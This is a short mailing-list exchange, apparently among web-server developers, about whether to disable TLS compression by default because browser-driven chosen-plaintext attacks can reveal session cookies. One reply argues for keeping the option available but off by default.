On Monday 08 October 2012, Roy T. Fielding wrote:
On Oct 7, 2012, at 6:05 PM, Eric Covener wrote:
Any opinions on the default change? AIUI current maintenance of
browsers have disabled TLS compression already, because they can
be driven to generate arbitrary traffic that eventually reveals
httpOnly session cookies.
Just disable it completely -- adaptive compression of headers is
inherently incompatible with the goals of TLS.
Is it? I think the main problem is the broken security model of web
browsers. There are many scenarios where compression does not hurt,
e.g. with non-browser clients that do not allow chosen plaintext
attacks, or if authentication is done by client certificate and not by
header.
Therefore, I would prefer leaving the option available. But defaulting
to off makes sense.
Cheers,
Stefan
